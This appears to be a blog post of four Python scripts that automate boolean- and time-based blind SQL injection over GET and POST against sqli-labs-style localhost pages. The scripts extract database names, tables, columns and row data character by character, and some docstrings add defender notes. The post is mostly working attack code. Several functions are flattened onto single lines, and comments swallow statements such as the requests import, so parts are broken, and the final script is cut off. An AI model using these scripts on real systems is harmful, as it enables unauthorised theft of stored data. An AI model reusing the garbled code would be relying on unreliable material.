Python脚本-时间盲注

BlindBool_get

import requests
from optparse import OptionParser
import threading#存放变量
# Module-level result holders, filled in by the Get* functions.
DBName = ""      # recovered database name
DBTables = []    # recovered table names
DBColumns = []   # recovered column names
DBData = {}      # recovered values: column name -> list of values
# Marker substring: a response body containing it is read as "condition true".
flag = 'You are in'
# Author's intent: raise the retry count and use short-lived connections to
# avoid "Max retries exceeded with url" when many requests are issued.
# NOTE(review): confirm this assignment actually changes the session's retry
# behaviour in the installed requests version.
requests.adapters.DEFAULT_RETRIES = 5
conn = requests.session()
# NOTE(review): confirm that requests honours this attribute on a Session.
conn.keep_alive = False


def GetDBName(url):
    """Recover the current database name through a boolean response oracle.

    A conditional SQL fragment is appended to ``url`` and requested with GET
    through the module-level ``conn``; the condition counts as true when
    ``flag`` occurs in the UTF-8 decoded body.  The length is searched in
    1..98, then each position is tested against ASCII codes 33..127.  The
    result is accumulated in the global ``DBName``; nothing is returned.

    Defender view: the server receives a long run of near-identical GETs whose
    query string contains ``length(database())`` and ``ascii(substr(``; this
    is easy to alert on, and a parameterized query removes the injection
    point entirely.

    NOTE(review): if no length matches, the loop ends with DBNameLen == 98 and
    the character loop still runs for 98 positions.
    """
    # Bind the module-level DBName so the += below updates it.
    global DBName
    print('[*]开始获取数据库名长度')
    # Holds the database-name length once found.
    DBNameLen = 0
    # Length probe.
    payload1 = "' and if(length(database())={0},1,0) --+"
    targetUrl = url + payload1
    for DBNameLen in range(1,99):
        res = conn.get(targetUrl.format(DBNameLen))
        if flag in res.content.decode("utf-8"):
            print("[*] 数据库名长度:" + str(DBNameLen))
            break
    print("[*]开始获取数据库名")
    # Character probe: {0} is the 1-based position, {1} the candidate code.
    payload1 = "' and if(ascii(substr(database(),{0},1))={1},1,0) --+"
    targetUrl = url+payload1
    for a in range(1,DBNameLen+1):
        for item in range(33,128):
            res = conn.get(targetUrl.format(a,item))
            if flag in res.content.decode('utf-8'):
                DBName += chr(item)
                print("[*]"+DBName)
                break


def GetDBTables(url,dbname):
    """Enumerate the table names of schema ``dbname`` via the boolean oracle.

    Probes ``information_schema.tables`` for the table count (1..99), then for
    each table its name length (1..98) and each character (ASCII 33..127).
    Names are appended to the global ``DBTables``.

    Defender view: every request references ``information_schema.tables`` in
    the query string, which legitimate application traffic rarely does.
    """
    global DBTables
    DBTableCount = 0
    print("[*] 开始获取{0}数据库表数量:".format(dbname))
    # Table-count probe.
    payload2 = "' and if((select count(*)table_name from information_schema.tables where table_schema='{0}')={1},1,0) --+"
    targetUrl = url + payload2
    for DBTableCount in range(1,100):
        res = conn.get(targetUrl.format(dbname,DBTableCount))
        if flag in res.content.decode("utf-8"):
            print("[*]{0}数据库中表的数量为:{1}".format(dbname,DBTableCount))
            break
    print("[*] 开始获取{0}数据库中的表名".format(dbname))
    tableLen = 0
    # a is the zero-based row offset used in "limit a,1".
    for a in range(0,DBTableCount):
        print("[*] 正在获取第{0}个表名".format(a+1))
        # Length of the current table name.
        for tableLen in range(1,99):
            payload2 = "' and if((select LENGTH(table_name) from information_schema.tables where table_schema='{0}' limit {1},1)={2},1,0) --+"
            targetUrl = url + payload2
            res = conn.get(targetUrl.format(dbname,a,tableLen))
            if flag in res.content.decode("utf-8"):
                break
        # Accumulator for the current table name.
        table = ""
        # b is the 1-based character position being guessed.
        for b in range(1,tableLen+1):
            payload2 = "' and if(ascii(substr((select table_name from information_schema.tables where table_schema = '{0}' limit {1},1),{2},1))={3},1,0) --+"
            targetUrl = url + payload2
            for c in range(33,128):
                res = conn.get(targetUrl.format(dbname,a,b,c))
                if flag in res.content.decode('utf-8'):
                    table += chr(c)
                    print(table)
                    break
        # Store the finished name and reset for the next table.
        DBTables.append(table)
        table = ''


def GetDBColumns(url,dbname,dbtable):
    """Enumerate the column names of ``dbname``.``dbtable`` via the boolean oracle.

    Probes ``information_schema.columns`` for the column count (0..98), then
    per column the name length (0..98) and each character (ASCII 33..127).
    Names are appended to the global ``DBColumns``.

    NOTE(review): the position loop starts at 0 although the sibling functions
    start substr() positions at 1, so the first pass per column presumably
    never matches and only costs requests.
    """
    global DBColumns
    DBColumnCount = 0
    # Column-count probe.
    print("[-]开始获取{0}数据表的字段数:".format(dbtable))
    for DBColumnCount in range(0,99):
        payload3 = "' and if((select count(column_name) from information_schema.columns where table_schema='{0}' and table_name='{1}')={2},1,0) --+"
        targetUrl = url + payload3
        res = conn.get(targetUrl.format(dbname,dbtable,DBColumnCount))
        if flag in res.content.decode('utf-8'):
            print("[*] {0}数据库中的{1}表的字段个数为{2}个:".format(dbname,dbtable,DBColumnCount))
            break
    # With the count known, recover each column name.
    columns = ''
    for a in range(0,DBColumnCount):
        print("正在获取第{0}个字段的长度和名称:".format(a+1))
        # Length of the current column name.
        for columnLen in range(0,99):
            payload3 = "' and if((select LENGTH(column_name) from information_schema.columns where table_schema='{0}' and table_name='{1}' limit {2},1)={3},1,0) --+"
            targetUrl = url + payload3
            res = conn.get(targetUrl.format(dbname,dbtable,a,columnLen))
            if flag in res.content.decode('utf-8'):
                break
        # b is the character position within the column name.
        for b in range(0,columnLen+1):
            payload3 = "' and if(ascii(substr((select column_name from information_schema.columns where table_schema='{0}' and table_name='{1}' limit {2},1),{3},1))={4},1,0) --+"
            targetUrl = url + payload3
            for c in range(33,128):
                res = conn.get(targetUrl.format(dbname,dbtable,a,b,c))
                if flag in res.content.decode('utf-8'):
                    columns += chr(c)
                    print(columns)
                    break
        # Store the finished name and reset for the next column.
        DBColumns.append(columns)
        columns = ''
# Row-data extraction function.
def GetDBData(url, dbtable, dbcolumn):global DBData# 先获取字段数据数量DBDataCount = 0print("[-]开始获取{0}表{1}字段的数据数量".format(dbtable, dbcolumn))for DBDataCount in range(99):payload = "'and if ((select count({0}) from {1})={2},1,0) --+"targetUrl = url + payloadres = conn.get(targetUrl.format(dbcolumn, dbtable, DBDataCount))if flag in res.content.decode("utf-8"):print("[-]{0}表{1}字段的数据数量为:{2}".format(dbtable, dbcolumn, DBDataCount))breakfor a in range(0, DBDataCount):print("[-]正在获取{0}的第{1}个数据".format(dbcolumn, a+1))#先获取这个数据的长度dataLen = 0for dataLen in range(99):payload = "'and if ((select length({0}) from {1} limit {2},1)={3},1,0) --+"targetUrl = url + payloadres = conn.get(targetUrl.format(dbcolumn, dbtable, a, dataLen))if flag in res.content.decode("utf-8"):print("[-]第{0}个数据长度为:{1}".format(a+1, dataLen))break#临时存放数据内容变量data = ""#开始获取数据的具体内容#b表示当前数据内容猜解的位置for b in range(1, dataLen+1):for c in range(33, 128):payload = "'and if (ascii(substr((select {0} from {1} limit {2},1),{3},1))={4},1,0) --+"targetUrl = url + payloadres = conn.get(targetUrl.format(dbcolumn, dbtable, a, b, c))if flag in res.content.decode("utf-8"):data += chr(c)print(data)break#放到以字段名为键,值为列表的字典中存放DBData.setdefault(dbcolumn,[]).append(data)print(DBData)#把data清空来,继续获取下一个数据data = ""# 盲注主函数
def StartSqli(url):
    """Run the full sequence: database name, tables, columns, then values.

    After listing the tables the operator picks one by its 1-based number;
    the column menu then repeats until 0 is entered.

    NOTE(review): the menu input goes straight through int() and is used as a
    list index without a range check, so a non-numeric or out-of-range entry
    raises.
    """
    GetDBName(url)
    print("[+]当前数据库名:{0}".format(DBName))
    GetDBTables(url,DBName)
    print("[+]数据库{0}的表如下:".format(DBName))
    for item in range(len(DBTables)):
        print("(" + str(item + 1) + ")" + DBTables[item])
    tableIndex = int(input("[*]请输入要查看表的序号:")) - 1
    GetDBColumns(url,DBName,DBTables[tableIndex])
    while True:
        print("[+]数据表{0}的字段如下:".format(DBTables[tableIndex]))
        for item in range(len(DBColumns)):
            print("(" + str(item + 1) + ")" + DBColumns[item])
        columnIndex = int(input("[*]请输入要查看字段的序号(输入0退出):"))-1
        # Entering 0 yields -1 here and leaves the menu.
        if(columnIndex == -1):
            break
        else:
            GetDBData(url, DBTables[tableIndex], DBColumns[columnIndex])


if __name__ == "__main__":
    # NOTE(review): the try block only covers option parsing and thread start;
    # the extraction itself runs in threadSQL, so a KeyboardInterrupt during
    # the run is not handled by this except clause.
    try:
        usage = "./BlindBool_get.py -u url"
        parser = OptionParser(usage)
        # Default target is a local lab page.
        parser.add_option('-u',type='string',dest='url',default='http://localhost/Less-8/?id=1',help='设置目标url')
        options,args=parser.parse_args()
        url = options.url
        # StartSqli(options.url)
        threadSQL = threading.Thread(target=StartSqli,args=(url,))
        threadSQL.start()
    except KeyboardInterrupt:
        print('Interrupted by keyboard inputting!!!')

BlindBool_post

import requests
from optparse import OptionParser
import threading#存放变量
# Module-level result holders, filled in by the Get* functions.
DBName = ""      # recovered database name
DBTables = []    # recovered table names
DBColumns = []   # recovered column names
DBData = {}      # recovered values: column name -> list of values
# Marker substring: a response body containing it is read as "condition true".
flag = 'flag'
# Author's intent: raise the retry count and use short-lived connections to
# avoid "Max retries exceeded with url" when many requests are issued.
# NOTE(review): confirm this assignment actually changes the session's retry
# behaviour in the installed requests version.
requests.adapters.DEFAULT_RETRIES = 5
conn = requests.session()
# NOTE(review): confirm that requests honours this attribute on a Session.
conn.keep_alive = False


def GetDBName(url):
    """Recover the current database name through a boolean oracle over POST.

    The conditional SQL is carried in the ``uname`` form field of a login
    form (``uname``/``passwd``/``submit``) posted to ``url`` through the
    module-level ``conn``; the condition counts as true when ``flag`` occurs
    in the decoded body.  Length is searched in 1..98, characters in ASCII
    33..127.  The result is accumulated in the global ``DBName``.

    Defender view: the payload sits in the request body, so URL-only access
    logs will not show it; body inspection or database query logging is
    needed to see ``ascii(substr(`` in the username field.  Binding the
    username as a query parameter removes the injection point.
    """
    # Bind the module-level DBName so the += below updates it.
    global DBName
    print('[*]开始获取数据库名长度')
    # Holds the database-name length once found.
    DBNameLen = 0
    # Length probe.
    for DBNameLen in range(1,99):
        payload = "admin' and if(length(database())="+str(DBNameLen)+",1,0) #"
        data = {'uname':payload,'passwd':'admin','submit':'Submit',}
        res = conn.post(url,data=data)
        if flag in res.content.decode("utf-8"):
            print("[*] 数据库名长度:" + str(DBNameLen))
            break
    print("[*]开始获取数据库名")
    # a is the 1-based position, item the candidate character code.
    for a in range(1,DBNameLen+1):
        for item in range(33,128):
            payload = "admin' and if(ascii(substr(database(),"+str(a)+",1))="+str(item)+",1,0) #"
            data = {'uname':payload,'passwd':'admin','submit':'Submit',}
            res = conn.post(url,data=data)
            if flag in res.content.decode('utf-8'):
                DBName += chr(item)
                print("[*]"+DBName)
                break


def GetDBTables(url,dbname):
    """Enumerate the table names of schema ``dbname`` via the POST boolean oracle.

    Probes ``information_schema.tables`` for the table count (1..99), then per
    table the name length (1..98) and each character (ASCII 33..127).  Names
    are appended to the global ``DBTables``.
    """
    global DBTables
    DBTableCount = 0
    print("[*] 开始获取{0}数据库表数量:".format(dbname))
    # Table-count probe.
    for DBTableCount in range(1,100):
        payload = "admin' and if((select count(*)table_name from information_schema.tables where table_schema='"+dbname+"')="+str(DBTableCount)+",1,0) #"
        data = {'uname':payload,'passwd':'admin','submit':'Submit',}
        res = conn.post(url,data=data)
        if flag in res.content.decode("utf-8"):
            print("[*]{0}数据库中表的数量为:{1}".format(dbname,DBTableCount))
            break
    print("[*] 开始获取{0}数据库中的表名".format(dbname))
    tableLen = 0
    # a is the zero-based row offset used in "limit a,1".
    for a in range(0,DBTableCount):
        print("[*] 正在获取第{0}个表名".format(a+1))
        # Length of the current table name.
        for tableLen in range(1,99):
            payload = "admin' and if((select LENGTH(table_name) from information_schema.tables where table_schema='"+dbname+"' limit "+str(a)+",1)="+str(tableLen)+",1,0) #"
            data = {'uname':payload,'passwd':'admin','submit':'Submit',}
            res = conn.post(url,data=data)
            if flag in res.content.decode("utf-8"):
                break
        # Accumulator for the current table name.
        table = ""
        # b is the 1-based character position being guessed.
        for b in range(1,tableLen+1):
            for c in range(33,128):
                payload = "admin' and if(ascii(substr((select table_name from information_schema.tables where table_schema = '"+dbname+"' limit "+str(a)+",1),"+str(b)+",1))="+str(c)+",1,0) #"
                data = {'uname':payload,'passwd':'admin','submit':'Submit',}
                res = conn.post(url,data=data)
                if flag in res.content.decode('utf-8'):
                    table += chr(c)
                    print(table)
                    break
        # Store the finished name and reset for the next table.
        DBTables.append(table)
        table = ''


def GetDBColumns(url,dbname,dbtable):
    """Enumerate the column names of ``dbname``.``dbtable`` via the POST boolean oracle.

    Probes ``information_schema.columns`` for the column count (0..98), then
    per column the name length (0..98) and each character (ASCII 33..127).
    Names are appended to the global ``DBColumns``.

    NOTE(review): the position loop starts at 0 although the sibling functions
    start substr() positions at 1, so the first pass per column presumably
    never matches and only costs requests.
    """
    global DBColumns
    DBColumnCount = 0
    # Column-count probe.
    print("[-]开始获取{0}数据表的字段数:".format(dbtable))
    for DBColumnCount in range(0,99):
        payload = "admin' and if((select count(column_name) from information_schema.columns where table_schema='"+dbname+"' and table_name='"+dbtable+"')="+str(DBColumnCount)+",1,0) #"
        data = {'uname':payload,'passwd':'admin','submit':'Submit',}
        res = conn.post(url,data=data)
        if flag in res.content.decode('utf-8'):
            print("[*] {0}数据库中的{1}表的字段个数为{2}个:".format(dbname,dbtable,DBColumnCount))
            break
    # With the count known, recover each column name.
    columns = ''
    for a in range(0,DBColumnCount):
        print("正在获取第{0}个字段的长度和名称:".format(a+1))
        # Length of the current column name.
        for columnLen in range(0,99):
            payload = "admin' and if((select LENGTH(column_name) from information_schema.columns where table_schema='"+dbname+"' and table_name='"+dbtable+"' limit "+str(a)+",1)="+str(columnLen)+",1,0) #"
            data = {'uname':payload,'passwd':'admin','submit':'Submit',}
            res = conn.post(url,data=data)
            if flag in res.content.decode('utf-8'):
                break
        # b is the character position within the column name.
        for b in range(0,columnLen+1):
            for c in range(33,128):
                payload = "admin' and if(ascii(substr((select column_name from information_schema.columns where table_schema='"+dbname+"' and table_name='"+dbtable+"' limit "+str(a)+",1),"+str(b)+",1))="+str(c)+",1,0) #"
                data = {'uname':payload,'passwd':'admin','submit':'Submit',}
                res = conn.post(url,data=data)
                if flag in res.content.decode('utf-8'):
                    columns += chr(c)
                    print(columns)
                    break
        # Store the finished name and reset for the next column.
        DBColumns.append(columns)
        columns = ''
# Row-data extraction function.
def GetDBData(url, dbtable, dbcolumn):global DBData# 先获取字段数据数量DBDataCount = 0print("[-]开始获取{0}表{1}字段的数据数量".format(dbtable, dbcolumn))for DBDataCount in range(99):payload = "admin' and if ((select count("+dbcolumn+") from "+dbtable+")="+str(DBDataCount)+",1,0) #"data = {'uname':payload,'passwd':'admin','submit':'Submit',}res = conn.post(url,data=data)if flag in res.content.decode("utf-8"):print("[-]{0}表{1}字段的数据数量为:{2}".format(dbtable, dbcolumn, DBDataCount))breakfor a in range(0, DBDataCount):print("[-]正在获取{0}的第{1}个数据".format(dbcolumn, a+1))#先获取这个数据的长度dataLen = 0for dataLen in range(99):payload = "admin' and if ((select length("+dbcolumn+") from "+dbtable+" limit "+str(a)+",1)="+str(dataLen)+",1,0) #"data = {'uname':payload,'passwd':'admin','submit':'Submit',}res = conn.post(url,data=data)if flag in res.content.decode("utf-8"):print("[-]第{0}个数据长度为:{1}".format(a+1, dataLen))break#临时存放数据内容变量data1 = ""#开始获取数据的具体内容#b表示当前数据内容猜解的位置for b in range(1, dataLen+1):for c in range(33, 128):payload = "admin' and if (ascii(substr((select "+dbcolumn+" from "+dbtable+" limit "+str(a)+",1),"+str(b)+",1))="+str(c)+",1,0) #"data = {'uname':payload,'passwd':'admin','submit':'Submit',}res = conn.post(url,data=data)if flag in res.content.decode("utf-8"):data1 += chr(c)print(data1)break#放到以字段名为键,值为列表的字典中存放DBData.setdefault(dbcolumn,[]).append(data1)print(DBData)#把data清空来,继续获取下一个数据data1 = ""# 盲注主函数
def StartSqli(url):
    """Run the full sequence: database name, tables, columns, then values.

    After listing the tables the operator picks one by its 1-based number;
    the column menu then repeats until 0 is entered.

    NOTE(review): the menu input goes straight through int() and is used as a
    list index without a range check, so a non-numeric or out-of-range entry
    raises.
    """
    GetDBName(url)
    print("[+]当前数据库名:{0}".format(DBName))
    GetDBTables(url,DBName)
    print("[+]数据库{0}的表如下:".format(DBName))
    for item in range(len(DBTables)):
        print("(" + str(item + 1) + ")" + DBTables[item])
    tableIndex = int(input("[*]请输入要查看表的序号:")) - 1
    GetDBColumns(url,DBName,DBTables[tableIndex])
    while True:
        print("[+]数据表{0}的字段如下:".format(DBTables[tableIndex]))
        for item in range(len(DBColumns)):
            print("(" + str(item + 1) + ")" + DBColumns[item])
        columnIndex = int(input("[*]请输入要查看字段的序号(输入0退出):"))-1
        # Entering 0 yields -1 here and leaves the menu.
        if(columnIndex == -1):
            break
        else:
            GetDBData(url, DBTables[tableIndex], DBColumns[columnIndex])


if __name__ == "__main__":
    # NOTE(review): the try block only covers option parsing and thread start;
    # the extraction itself runs in threadSQL, so a KeyboardInterrupt during
    # the run is not handled by this except clause.
    try:
        usage = "./BlindBool_post.py -u url"
        parser = OptionParser(usage)
        # Default target is a local lab page.
        parser.add_option('-u',type='string',dest='url',default='http://localhost/Less-15',help='设置目标url')
        options,args=parser.parse_args()
        url = options.url
        # StartSqli(options.url)
        threadSQL = threading.Thread(target=StartSqli,args=(url,))
        threadSQL.start()
    except KeyboardInterrupt:
        print('Interrupted by keyboard inputting!!!')

BlindTime_get

#!/usr/bin/python3
# -*- coding: utf-8 -*-import requests
from optparse import OptionParser
import time
import threading# 存放数据库名变量
DBName = ""
# 存放数据库表变量
DBTables = []
# 存放数据库字段变量
DBColumns = []
# 存放数据字典变量,键为字段名,值为字段数据列表
DBData = {}# 设置重连次数以及将连接改为短连接
# 防止因为HTTP连接数过多导致的 Max retries exceeded with url
requests.adapters.DEFAULT_RETRIES = 5
conn = requests.session()
conn.keep_alive = False# 盲注主函数
def StartSqli(url):
    """Run the full sequence: database name, tables, columns, then values.

    After listing the tables the operator picks one by its 1-based number;
    the column menu then repeats until 0 is entered.

    NOTE(review): the menu input goes straight through int() and is used as a
    list index without a range check, so a non-numeric or out-of-range entry
    raises.
    """
    GetDBName(url)
    print("[+]当前数据库名:{0}".format(DBName))
    GetDBTables(url,DBName)
    print("[+]数据库{0}的表如下:".format(DBName))
    for item in range(len(DBTables)):
        print("(" + str(item + 1) + ")" + DBTables[item])
    tableIndex = int(input("[*]请输入要查看表的序号:")) - 1
    GetDBColumns(url,DBName,DBTables[tableIndex])
    while True:
        print("[+]数据表{0}的字段如下:".format(DBTables[tableIndex]))
        for item in range(len(DBColumns)):
            print("(" + str(item + 1) + ")" + DBColumns[item])
        columnIndex = int(input("[*]请输入要查看字段的序号(输入0退出):"))-1
        # Entering 0 yields -1 here and leaves the menu.
        if(columnIndex == -1):
            break
        else:
            GetDBData(url, DBTables[tableIndex], DBColumns[columnIndex])
# Database-name function.
def GetDBName(url):
    """Recover the current database name through a response-time oracle.

    A conditional SQL fragment that calls ``sleep(5)`` when the condition
    holds is appended to ``url`` and requested with GET through the
    module-level ``conn``.  A request whose wall-clock duration (measured with
    ``time.time()``) is at least 5 seconds counts as true.  Length is searched
    in 1..98, characters in ASCII 33..127; the result is accumulated in the
    global ``DBName``.

    Defender view: the tell-tale signs are ``sleep(`` in a request parameter,
    responses clustered at just over five seconds, and database threads held
    in a sleep state.  A statement-time limit on the database account blunts
    the timing signal, and a parameterized query removes the injection point.

    NOTE(review): any response delayed by 5 s for unrelated reasons is
    indistinguishable from a match here.
    """
    # Bind the module-level DBName so the += below updates it.
    global DBName
    print("[-]开始获取数据库名长度")
    # Holds the database-name length once found.
    DBNameLen = 0
    # Length probe.
    payload = "' and if(length(database())={0},sleep(5),0) --+"
    # Final request URL is the base URL plus the probe.
    targetUrl = url + payload
    for DBNameLen in range(1, 99):
        # Time the request.
        timeStart = time.time()
        res = conn.get(targetUrl.format(DBNameLen))
        timeEnd = time.time()
        # A delay of 5 s or more is read as "condition true".
        if timeEnd - timeStart >= 5:
            print("[+]数据库名长度:" + str(DBNameLen))
            break
    print("[-]开始获取数据库名")
    payload = "' and if(ascii(substr(database(),{0},1))={1},sleep(5),0)--+"
    targetUrl = url + payload
    # a is the 1-based substr() start position.
    for a in range(1, DBNameLen+1):
        # b runs over ASCII codes 33..127.
        for b in range(33, 128):
            timeStart = time.time()
            res = conn.get(targetUrl.format(a,b))
            timeEnd = time.time()
            if timeEnd - timeStart >= 5:
                DBName += chr(b)
                print("[-]"+ DBName)
                break
# Table-enumeration function.
def GetDBTables(url, dbname):global DBTables#存放数据库表数量的变量DBTableCount = 0print("[-]开始获取{0}数据库表数量:".format(dbname))#获取数据库表数量的payloadpayload = "' and if((select count(table_name) from information_schema.tables where table_schema='{0}' )={1},sleep(5),0) --+"targetUrl = url + payload#开始遍历获取数据库表的数量for DBTableCount in range(1, 99):timeStart = time.time()res = conn.get(targetUrl.format(dbname, DBTableCount))timeEnd = time.time()if timeEnd - timeStart >= 5:print("[+]{0}数据库的表数量为:{1}".format(dbname, DBTableCount))breakprint("[-]开始获取{0}数据库的表".format(dbname))# 遍历表名时临时存放表名长度变量tableLen = 0# a表示当前正在获取表的索引for a in range(0,DBTableCount):print("[-]正在获取第{0}个表名".format(a+1))# 先获取当前表名的长度for tableLen in range(1, 99):payload = "' and if((select length(table_name) from information_schema.tables where table_schema='{0}' limit {1},1)={2},sleep(5),0) --+"targetUrl = url + payloadtimeStart = time.time()res = conn.get(targetUrl.format(dbname, a, tableLen))timeEnd = time.time()if timeEnd - timeStart >= 5:break# 开始获取表名# 临时存放当前表名的变量table = ""# b表示当前表名猜解的位置for b in range(1, tableLen+1):payload = "' and if(ascii(substr((select table_name from information_schema.tables where table_schema='{0}' limit {1},1),{2},1))={3},sleep(5),0)--+"targetUrl = url + payload# c表示33~127位ASCII中可显示字符for c in range(33, 128):timeStart = time.time()res = conn.get(targetUrl.format(dbname, a, b, c))timeEnd = time.time()if timeEnd - timeStart >= 5:table += chr(c)print(table)break#把获取到的名加入到DBTablesDBTables.append(table)#清空table,用来继续获取下一个表名table = ""# 获取数据库表的字段函数
def GetDBColumns(url, dbname, dbtable):global DBColumns# 存放字段数量的变量DBColumnCount = 0print("[-]开始获取{0}数据表的字段数:".format(dbtable))for DBColumnCount in range(99):payload = "' and if((select count(column_name) from information_schema.columns where table_schema='{0}' and table_name='{1}')={2},sleep(5),0) --+"targetUrl = url + payloadtimeStart = time.time()res = conn.get(targetUrl.format(dbname, dbtable, DBColumnCount))timeEnd = time.time()if timeEnd - timeStart >= 5:print("[-]{0}数据表的字段数为:{1}".format(dbtable, DBColumnCount))break# 开始获取字段的名称# 保存字段名的临时变量column = ""# a表示当前获取字段的索引for a in range(0, DBColumnCount):print("[-]正在获取第{0}个字段名".format(a+1))# 先获取字段的长度for columnLen in range(99):payload = "' and if((select length(column_name) from information_schema.columns where table_schema='{0}' and table_name='{1}' limit {2},1)={3},sleep(5),0) --+"targetUrl = url + payloadtimeStart = time.time()res = conn.get(targetUrl.format(dbname, dbtable, a, columnLen))timeEnd = time.time()if timeEnd - timeStart >= 5:break# b表示当前字段名猜解的位置for b in range(1, columnLen+1):payload = "' and if(ascii(substr((select column_name from information_schema.columns where table_schema='{0}' and table_name='{1}' limit {2},1),{3},1))={4},sleep(5),0) --+"targetUrl = url + payload# c表示33~127位ASCII中可显示字符for c in range(33, 128):timeStart = time.time()res = conn.get(targetUrl.format(dbname, dbtable, a, b, c))timeEnd = time.time()if timeEnd - timeStart >= 5:column += chr(c)print(column)break# 把获取到的名加入到DBColumnsDBColumns.append(column)#清空column,用来继续获取下一个字段名column = ""# 获取表数据函数
def GetDBData(url, dbtable, dbcolumn):global DBData# 先获取字段数据数量DBDataCount = 0print("[-]开始获取{0}表{1}字段的数据数量".format(dbtable, dbcolumn))for DBDataCount in range(99):payload = "' and if((select count({0}) from {1})={2},sleep(5),0) --+"targetUrl = url + payloadtimeStart = time.time()res = conn.get(targetUrl.format(dbcolumn, dbtable, DBDataCount))timeEnd = time.time()if timeEnd - timeStart >= 5:print("[-]{0}表{1}字段的数据数量为:{2}".format(dbtable, dbcolumn, DBDataCount))breakfor a in range(0, DBDataCount):print("[-]正在获取{0}的第{1}个数据".format(dbcolumn, a+1))#先获取这个数据的长度dataLen = 0for dataLen in range(99):payload = "'and  if((select length({0}) from {1} limit {2},1)={3},sleep(5),0) --+"targetUrl = url + payloadtimeStart = time.time()res = conn.get(targetUrl.format(dbcolumn, dbtable, a, dataLen))timeEnd = time.time()if timeEnd - timeStart >= 5:print("[-]第{0}个数据长度为:{1}".format(a+1, dataLen))break#临时存放数据内容变量data = ""#开始获取数据的具体内容#b表示当前数据内容猜解的位置for b in range(1, dataLen+1):for c in range(33, 128):payload = "' and  if(ascii(substr((select {0} from {1} limit {2},1),{3},1))={4},sleep(5),0) --+"targetUrl = url + payloadtimeStart = time.time()res = conn.get(targetUrl.format(dbcolumn, dbtable, a, b, c))timeEnd = time.time()if timeEnd - timeStart >= 5:data += chr(c)print(data)break#放到以字段名为键,值为列表的字典中存放DBData.setdefault(dbcolumn,[]).append(data)print(DBData)#把data清空来,继续获取下一个数据data = ""if __name__ == '__main__':try:usage = "./BlindTime_get.py -u url"parser = OptionParser(usage)# 目标URL参数-uparser.add_option('-u', '--url', dest='url',default='http://localhost/Less-9/?id=1', type='string',help='target URL')options, args = parser.parse_args()url = options.urlthreadSQL = threading.Thread(target=StartSqli,args=(url,))threadSQL.start()except KeyboardInterrupt:print("Interrupted by keyboard inputting!!!")

BlindTime_post

#!/usr/bin/python3
# -*- coding: utf-8 -*-import requests
from optparse import OptionParser
import time
import threading# 存放数据库名变量
DBName = ""
# 存放数据库表变量
DBTables = []
# 存放数据库字段变量
DBColumns = []
# 存放数据字典变量,键为字段名,值为字段数据列表
DBData = {}# 设置重连次数以及将连接改为短连接
# 防止因为HTTP连接数过多导致的 Max retries exceeded with url
requests.adapters.DEFAULT_RETRIES = 5
conn = requests.session()
conn.keep_alive = False# 获取数据库名函数
def GetDBName(url):
    """Recover the current database name through a timing oracle over POST.

    The conditional SQL, which calls ``sleep(5)`` when the condition holds, is
    carried in the ``uname`` field of a login form posted to ``url`` through
    the module-level ``conn``.  A request lasting at least 5 seconds
    (``time.time()`` difference) counts as true.  Length is searched in 1..98,
    characters in ASCII 33..127; the result is accumulated in the global
    ``DBName``.

    Defender view: the payload travels in the request body, so it is visible
    only to body inspection or database query logging; slow login requests
    clustered at just over five seconds are the external symptom.

    NOTE(review): in the length loop the timer starts before the payload is
    built, in the character loop likewise; the measured interval therefore
    includes local string building as well as the request.
    """
    # Bind the module-level DBName so the += below updates it.
    global DBName
    print("[-]开始获取数据库名长度")
    # Holds the database-name length once found.
    DBNameLen = 0
    for DBNameLen in range(1, 99):
        # Start of the timed interval.
        timeStart = time.time()
        payload = "admin' and if(length(database())="+str(DBNameLen)+",sleep(5),0) #"
        # Example of a rendered payload: "admin' and if(length(database())=8,sleep(5),0) #"
        data = {'uname':payload,'passwd':'admin','submit':'Submit',}
        res = conn.post(url,data=data)
        # End of the timed interval.
        timeEnd = time.time()
        # A delay of 5 s or more is read as "condition true".
        if timeEnd - timeStart >= 5:
            print("[+]数据库名长度:" + str(DBNameLen))
            break
    print("[-]开始获取数据库名")
    # a is the 1-based substr() start position.
    for a in range(1, DBNameLen+1):
        # b runs over ASCII codes 33..127.
        for b in range(33, 128):
            timeStart = time.time()
            payload = "admin' and if(ascii(substr(database(),"+str(a)+",1))="+str(b)+",sleep(5),0)#"
            data = {'uname':payload,'passwd':'admin','submit':'Submit',}
            res = conn.post(url,data)
            timeEnd = time.time()
            if timeEnd - timeStart >= 5:
                DBName += chr(b)
                print("[-]"+ DBName)
                break
# Table-enumeration function.
def GetDBTables(url, dbname):global DBTables#存放数据库表数量的变量DBTableCount = 0print("[-]开始获取{0}数据库表数量:".format(dbname))#开始遍历获取数据库表的数量for DBTableCount in range(1, 99):timeStart = time.time()payload = "admin' and if((select count(table_name) from information_schema.tables where table_schema='"+dbname+"' )="+str(DBTableCount)+",sleep(5),0) #"data = {'uname':payload,'passwd':'admin','submit':'Submit',}res = conn.post(url,data=data)timeEnd = time.time()if timeEnd - timeStart >= 5:print("[+]{0}数据库的表数量为:{1}".format(dbname, DBTableCount))breakprint("[-]开始获取{0}数据库的表".format(dbname))# 遍历表名时临时存放表名长度变量tableLen = 0# a表示当前正在获取表的索引for a in range(0,DBTableCount):print("[-]正在获取第{0}个表名".format(a+1))# 先获取当前表名的长度for tableLen in range(1, 99):payload = "admin' and if((select length(table_name) from information_schema.tables where table_schema='"+dbname+"' limit "+str(a)+",1)="+str(tableLen)+",sleep(5),0) #"timeStart = time.time()data = {'uname':payload,'passwd':'admin','submit':'Submit',}res = conn.post(url,data=data)timeEnd = time.time()if timeEnd - timeStart >= 5:break# 开始获取表名# 临时存放当前表名的变量table = ""# b表示当前表名猜解的位置for b in range(1, tableLen+1):# c表示33~127位ASCII中可显示字符for c in range(33, 128):timeStart = time.time()payload = "admin' and if(ascii(substr((select table_name from information_schema.tables where table_schema='"+dbname+"' limit "+str(a)+",1),"+str(b)+",1))="+str(c)+",sleep(5),0)#"data = {'uname':payload,'passwd':'admin','submit':'Submit',}res = conn.post(url,data=data)timeEnd = time.time()if timeEnd - timeStart >= 5:table += chr(c)print(table)break#把获取到的名加入到DBTablesDBTables.append(table)#清空table,用来继续获取下一个表名table = ""# 获取数据库表的字段函数
